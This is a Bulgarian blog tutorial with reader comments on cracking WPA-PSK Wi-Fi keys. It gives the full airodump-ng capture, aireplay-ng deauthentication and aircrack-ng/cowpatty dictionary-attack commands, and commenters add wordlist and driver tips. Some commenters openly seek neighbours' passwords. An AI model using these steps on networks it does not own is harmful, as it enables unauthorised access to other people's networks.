Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0
Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.
# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0
След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.
За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty
Първо ще реализираме кракване с aircrack
cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Сега ще направим кракване с cowpatty:
cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net
И двата метода успяват да кракнат паролата и да я изведат.
Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com: Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
До скоро от mpetrov.net
PS: Това е истината-> EPRB
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Разбиване на Wireless с WPA encoding,
Не се мъчете, няма ли я паролата в password.lst няма да стане.Аз доста време си играх и стигнах до този извод.Като напиша паролата точно в password.lst си излиза,но една буква да сменя или само шрифта с малки букви и нестава.Такъв клип като неговия и аз мога да направя с моя рутер и всичко е на 100%,но това не означава че ще хакна паролата на съседа.НЕСТАВА
Явно е трудно за разбиране, че за да бъде декриптирам WPA ключ трябва да го има в wordlist-a.
А, как може да си направиш собствен речник който да си компилираш със собствения компютер? благодаря за вниманието и статията разбира се !! :)
zdraveite hakeri:)az imam sledniq problem-nemoga da iskaram terminalite molq za pomo6t
Здравей смакнахси бт4-финал тази прогрмака за wi-fi то..С 7 ца та съм но слет като заредих имаж файла не ми се показа сетапа…сега ще копирам файловете които са на ико файла да ги скиваш….boot casper това са папки….boot catalog catalog fail….md5sun tekstof fail….
сичките ги гледах никаде ни намерих сетаб…
мерси за отговора предварително..
Много ми е интересно хора които не могат да си напишат името правилно как възнамеряват да хакват компютри?!? За това не е ли нужно мозък? Имам по-високо мнение за хакерите….или информацията ми е стара!?
@jiro
То това се казва -- "номера на китайката" :=D
А и по принцип нищо от това нито в Utube, нито където ще да е , ако става на въпрос не за ТВОЯ WiFi с вече известна парола и etc. -- просто ДРЕНКИ ,братче.
Иво, каква беше паролата на комшията, просто от любопитство..@Ivoo
Записах програмата да се буутва но като стартирам програмата никаде не ми излизат терминалите .Моля кажете ми защо не мога да ги намеря
@Karadimov
Ето я паролата на комшията :) http://vbox7.com/play:9e8c3353
Марти много бих ти бил благодарен ако ми кажеш как да си вкарам wordlista в бак трака иначе се сдобих ве4е с такъв ама не ми е ясно как да го вкарам в програмата все пак не си длажен но те умолявам ако може :)
^ Ако искаш дай скайп мога да ти обясня някой работи.
@Stoi4o
Стойчо,,мисля че Мартин няма да ти отговори,,ами се хванах лично да направя видео как можеш да си решиш проблема,, ето :
http://www.vbox7.com/play:d966e751
Ако все още не е заредено в В-бокса,,опитай по касно
Zdravei!..Zna4i ne moga si podkaram wirelessa…s windows xp sym i sym slojil virtualbox..na nego backtrack4… v youtube ima klip4eta kak se pravi si4ko svyrzano s virtualbox i back track 4…pravq vsi4ko no ne moga da q podkaram…na backtracka nqmam nikakyv net…mostovia adapter mislq 4e vsi4ko e nared…no ako ima6 nqkakva ideq pleace help me :P
kaji razpoznava li ti karata vladislav4o 6tot na men ne mi razpoznava kartata kato mi e na virtual
Момчета аз съм моряк и не мисля да се вързвам в чужди мрежи в българия но по пристанищата има мрежи но с пароли .Аз съм с windows xp изтеглих back track 4 r1 подкарвам го но когато стигна до командата cd /pentest/wireless/aircrack-g/test ми дава че неможе да намери cd . Също и sell konsola ми излиза без терминали и падащи менюта и за да продължа от команда # airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0 към # aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0 изполсвам ctrl + c и може би прекъсвам процеса Никога несъм работил с Linux и незнам дали трябва да имам инсталиран Linux Моля в даите ми съвет как да постъпя
ЗДРАВЕИТЕ ПО ПРИНЦИП МОЖЕЛИ НЯКОИ ДА МИ ОБЕСНИ КАК МОГА ДА НАПРАВИА ВРСКА С РУТЕР НА WPA И ДА ВИДИЯ ПАРОЛАТА АКО НЯКОИ ЗНАИЕ И ИСКА ДА ПОМОГНЕ ДА ПИШЕ :)
Имам сериозен въпрос… Инсталирах Back Track 4 на флашката но не ми тръгва… мисълта ми е, че след като задам командата # startx ми изписва съобщение screen found , but none have a usable configuration , МОЛЯ ако някои може да помогне по този въпрос да пише на [email protected] . От 5 дена вече се мъча да го подкарам… компютърът е:
Acer Aspire 5740G
Processor: Intel Core i3-370M 2.4GHz
Video: ATI Mobility Radeon HD 5650 1024MBVRAM
RAM: 4Gb DDR3
OS: Windows 7 Ultimate
@Мартин Петров
ЗДРАВЕИ МОЖЕШ ЛИ ДА МИ КАЖЕШ ДАЛИ ИМА И ДРУГ НАЧИН ДА ВЗЕМЕШ КОДА WPA AКО МОЖЕС НАПШИ
Abe s windols xp sam i kato svalq black trak r2 na rar format i kato go razhiviram nqma setup file i nz kak da go installna molq za pomosht ..??
Здравейте и аз имам малки проблеми с wpa2.По описани тук начин накрая започва да търси някаква парола и намира за 2 сек но всеки път дава различни и са грешни разбира се.Накрая не ми пише key found а пише текущата парола е еди коя си.Гледах по нета други клипчета но има малка неяснота там.Преди за заредят сар файла пишат някакъв mypass.txt примерно.Та въпрсоа ми е аз ли трябва да го направя този файл.На десктопа ли да е,трябва ли да вкарвам вътря някакви кодове това не ми е ясно.Трябва ми малко обяснение и мисля че ще схвана може да ме потърсите и на скайп:w3stbam
Здравейте!
При мен всичко се получава, с изключение че доста бавно получавам data пакетите -- 10-11 часа за да събера 20к! Какъв е проблема и има ли вариант за ускоряване?
Благодаря!
ДА ПОЯСНЯ НЕЩО НЕ СЕ ЗАНИМАВАИТЕ ДА ХАКВАТЕ WPA КОИТО НЕ Е СЪС ЗАВОДСКА ПАРОЛА(КАКТО ПОВЧЕТО В БГ ДА НЕ КАЖА ВСИЧКИ).ЗАЩОТО АКО Е ЛИЧНА (КАКЕПАРОЛАТА ) КАТО МОЯТА В МОМЕНТА,Е НЕВЪЗМОЖНО ДА СЕ НАМЕРИ В РЕЧНИКА КОИТО ГЕНЕРИРАТЕ ИЛИ ПОЛЗВАТЕ.А КЛИПОВЕТЕ КОИТО ГЛЕДАТЕ ,И СЕ НАДЪХВАТЕ ,СА НА ВЪЗМОЖНО НАЙ-УМРЕЛИТЕ РУТЕРИ.И ДЕМОНСТРАЦИИТЕ СА ПРАВЕНИ ОТ ХОРА КОИТО СИ САМОХАКВАТ НЕТА ТОЕСТ СИ ЗНАЯТ ПАРОЛАТА И СИ Я ВКАРВАТ В РЕЧНИКА..ИМА НАЧИН ЗА ХАКВАНЕ НА WPA НА 100% С (15000 РЕИНБОЛ ТАБЛИЦИ ОТ КОИТО ЕДНАТА Е ОТ ПОРЯДЪКА НА 650-700МБ) НО ОТНЕМА ОТ 1 СЕКУНДА ДО БЕЗКРАИНОСТ ??? 5-ТА ГОДИНА СИ ГУБЯ ВРЕМЕТО С WPA.ПО ГОРЕ В КЛИПА ВИЖДАМ,ЧЕ ПОНЕ ЕДИН ОТ ВАС Е ИМАЛ КЪСМЕТ ДА ПОПАДНЕ НА WEP И ДА СЕ ИЗКЕФИ ЧАО ОТ МЕНЕ
Здравейте форумци,
искам да попитам от къде мога да си изтегля речник с пароли ? Някои да даде акъл понеже моя не ми стига.До сега не съм се занимавал с БТ4 и тепърва ще започвам да ги инсталирам на лаптопа си.
Благодаря на всички предварително!
:)))))))))
pi4ove……… ve4e ima realizirana 5-ta versia na backtrack. prodava se s antena 10 decibela i ne raboti s komandi v konzola. gotova programa e i razbiva kakto wep,taka wpa.
ima DA, az veche si go kupih ot sergiite za $ 35! :D
mene ne samo antena mi dadoha, no i vsichki paroli(po gradove,imena,oblasti,adresi i etc.)
aide uspeh i da znaete che chakane mu e maikata i malko ot znanqta v Python :D
Тази тема е представителна извадка колко много неграмотни хора с компютри се опитват да бъдат и хакери. Уважаеми псевдо Хакери, моля научете се първо да пишете на родният си език, след това се научете ПОНЕ как се държи мишката и накрая, ако все още не сте се отчаяли от посредствеността си -- се занимавайте със сложни неща, като разбиване на пароли :)
Имам въпрос след като задам iwconfig wlan0 mode monitoring ми излиза някаква грешка Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; No such device. От какво може да е ??? Пишете ми на [email protected] Благодаря :)
Влез в youtube.com и напиши "how to install Backtrack 4" И др. път провери дали първо няма нещо там и след това задавай въпроси!!!
Ivaylo путио с путиото кат си дръпниш Back Track 4 r2 не ти излиза в rar формат е в iso запиши си го на DVD диск и си готов !
хахахахха
Така не съм се смял отдавна :))))
Та на повечето им е трудно да се изразяват , а да не говорим за писане.
Какво да кажем за crack ……….
zdraveite svalih si 2 3 re4nika no ne znam kak da gi karam v backtrack 4 moje li da mi obesnite tuk ili na skype mi qkiq_pi4_pld mersi predvaritelno :)
За съжаление, трябва да се направят следните допускания…
В password.lst трябва да присъства паролата /KEY -WPA/ набелязаната мрежа. При този тест Мартин Петров, ръчно е въвел в списъка паролата на набелязаната за проникване мрежа. Ако в password листа липсва паролата от рода "alex_2011_007" e невъзможно да се достигне до компрометиране или намиране на паролата. Метода е приложим за пароли в числов вид: 00000000 до 99999999.
Освен това има грешка в този ред: cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Правилния ред е: cd /pentest/wireless/aircrack-ng/test/
aircrack-ng -w password.lst /root/wpa-01.cap
Съвет, как да направим потребителски речник и да имаме 100% успех на разбиване WPA числова парола за достъп!
1) Отваряме EXEL файл -> въвеждаме е клетка 00000000, в клетката под нея въвеждаме 00000001. Маркираме двете клетки и дърпаме с курсора за да направим числова редица от рода 00000001, 00000002, …. /до/ 99999999.
2) След като извършим тази ИТЕРАЦИЯ /манипулация/ създаваме текстов файл /.txt/ (например: KEYbg.txt) и маркираме от EXEL числовата редица и поставяме в текстовия файл.
3) Отваряме BlackTrack и отиваме в директория: media:/pentest/wireless/aircrack-ng/test и поставяме текстовият файл /KEYbg.txt/
4) Използваме метода на Мартин Петров за събиране на пакетите и компрометиране на WPA парола.
5) променяме само последната част с декриптирането:
cd /pentest/wireless/aircrack-ng/test/
aircrack-ng -w KEYbg.txt /root/wpa*.cap
Забележка: wpa*.cap -- означава, че aircrack ще отвори всички файлове с пакети от рода: wpa-01.cap, wpa-02.cap и т.н.
Надявам се да съм Ви полезен. При мен подейства!!!
bihte li mi kazali kade trqbva da vkaram wordlist ?
Здравейте. Закупих от чужбина ето това: http://cgi.ebay.com/2000mw-3-Amplifier-RTL8187L-USB-WiFi-15dbi-Antenna-20G-/170586133539?pt=LH_DefaultDomain_0&hash=item27b7b9d423
Има софтуер с който разбивам WEB мрежи, но искам да отключа и WPA/WPA2 мрежи.Възможно ли е това. ОС ми е Windows XP. Качих си виртуално VMware Player и стартирах Linux Ubuntu, но нищо не можах да направя. Може ли малко помощ. Ще съм благодарен на някой ако помогне.
Не-знам защо като го заредя виртуално, не ми намира USB wi-fi приемника. Windowsa го намира, но не и виртуалната ОС?
Изписва ми следната грешка като напиша: # iwconfig wlan0 mode monitoring Грешката е: Error for wireless request "Set Mode" (8B06): SET failed on device wlan0 : No such device.
@Lyubomir
Когато машината ти е по нова, или за друго устройство в Линукса ги няма всички драйвери.
В твоя случай драйвера на Реалтек Линукса не го разпознава. Трябва да си го монтираш.
1. изтегляш си драйвера от http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=2&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8187L или предполагам ти е приложено дискче към покупката за инстал, вземаш го от него.
2. Ако е архивирано, разархивираш с команда: tar -xzvf (име на архивирания файл)
3. след това монтираш
cd (име на разархивирания)
make
make install
cp -Ra ~/име на разархивирания/firmware/RTL8187L/ /lib/firmware
4 Зареждаш файловете.
depmod -a
modprobe r8187se_pci
5. Рестартираш системата и готово.
@Alex
За числова парола да.
Въпросът е за парола от вида на:
da_yadete_na_bay_ivan_……..
Последното можете да си добавите сами :)
@gEORGI
evala bratle 10x to4na taka e realno ne e nevuzmojno no parolite stigat do trilioni kombinacii
@Мартин Петров
a dobro utro tva trea6e da go spomene6 i v klipovete ne da zavurti6 16 key i da ti ispi6e key foumd da si mislqt dr 4e stavalo mn lesno pri polojenie 4e si znae6 parolata i si q vpisal v word lista
@Lyubomir
napi6i purvo airmon-ng ako ne ti izlezne imeto pod interface pr wlano eth0 i dr zna4i drivera za wirelesa ne figurira v linuxa i nqma da stane
@Nikolai
bratle bes da te obijdam toq na4in e mn purvobite ako trqbva da suzdade6 0000000000 do 9999999999 pod windows 6te si svur6i 1 vo operativnata pamet za suzdavaneto ako vuob6te uspee6 ako ne ti e zaciklil windowsa predi tova pravi se mn inteligentno s password generatori no pak trqbva da ima6 mn svobodno mqsto za da suzdade6 takuv list all combination vmesto da ispolzva ram pametta ispozva HDD pametta za da suzdade password list ot porqduka pr na 90 miliarda kombinacii uspeh s exel za tazi generaciq:)
@Alex
bratle bes da te obijdam toq na4in e mn purvobite ako trqbva da suzdade6 0000000000 do 9999999999 pod windows 6te si svur6i 1 vo operativnata pamet za suzdavaneto ako vuob6te uspee6 ako ne ti e zaciklil windowsa predi tova pravi se mn inteligentno s password generatori no pak trqbva da ima6 mn svobodno mqsto za da suzdade6 takuv list all combination vmesto da ispolzva ram pametta ispozva HDD pametta za da suzdade password list ot porqduka pr na 90 miliarda kombinacii uspeh s exel za tazi generaciq:)
@Steliyan
e ti za haker li se ima6 ta tolko naduto govori6 da ne si hacknal komputrite na NASA ili na Pentagona ospokoi se malko seki ima kakvo da kaje i kakvo da dopulni po temata vuprosa e v na4ina
# iwconfig wlan0 mode monitoring
На мен ми изписа тази грешка , същото ми изписва и с eth0,mon0.
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0; Device or resource busy.
А като напиша airmon-ng отдоло ми изписва това и под него нищо друго
Interface chipset driver
Дайте съвет.
Martine vig tova … http://www.youtube.com/view_play_list?p=C9B252B31851C630 …interesno i dosta po lesno
http://www.youtube.com/watch?v=Zq86oP-dxk4